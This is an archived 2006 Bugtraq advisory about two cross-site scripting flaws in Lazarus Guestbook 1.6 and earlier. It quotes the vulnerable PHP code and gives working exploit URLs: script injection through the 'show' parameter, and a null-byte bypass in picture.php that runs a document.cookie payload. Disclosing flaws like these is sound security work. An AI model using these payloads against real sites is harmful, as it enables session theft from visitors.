lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060712053407.24979.qmail@securityfocus.com>
Date: 12 Jul 2006 05:34:07 -0000
From: simo64@...il.com
To: bugtraq@...urityfocus.com
Subject: Lazarus Guestbook Cross Site Scripting Vulnerabilities


Produce : Lazarus Guestbook
Website : http://carbonize.co.uk/Lazarus/
Version : <= 1.6
Problem : Cross Site Scripting

1) 
The first probleme is in codes-english.php ,"show" parameter in lang/codes-english.php isn't properly sanitised
This can be exploited to execute arbitrary HTML and javascript code

 Vulnerable code in  lang/codes-english.php near line 4

1  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
2  <html>
3  <head>
4  <title><?php echo($_GET['show']); ?></title> 

Exploit : 

http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E[XSS]
http://localhost/lazarusgb/lang/codes-english.php?show=%3C/title%3E<script>alert(document.cookie);</script>


2)
the seconde probleme is in picture.php , the script verifiy fist if image file exists
after it display it ,

vulnerable code : in picture.php
********************************

24  if (!empty($_GET['img'])) {
26      if (file_exists("$GB_TMP/$_GET[img]")) {
27          $size = @GetImageSize("$GB_TMP/$_GET[img]");
28          $picture = "$GB_PG[base_url]/$GB_TMP/$_GET[img]";
29      }
..      ............
49      <td align="center" valign="middle">
50      <?php
51        if (!empty($_GET['img']) && is_array($size)) {
52            echo "<a href=\"javascript:window.close()\"><img src=\"$picture\" width=\"$size[0]\" height=\"$size[1]\" border=\"0\"></a>\n";
53        }
54    ?>
55    </td>    
    
****************
    if magic_quote_gpc = OFF we can bypass this protection by specifing existing image file ( Exemple : "img/home.gif") and using a nullchar ( %00 )
    
    POC : http://localhost/lazarusgb/picture.php?img=../img/home.gif%00[code]
    
    file_exists("$GB_TMP/$_GET[img]") will return true and html code will be executed
    
    Exploit: 
    
    http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E[XSS]
    http://localhost/lazarusgb/picture.php?img=../img/home.gif%00%22%3E<script>alert(document.cookie);</script>
    
Contact : simo64[at]gmail[dot]com
Moroccan Security Research Team


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ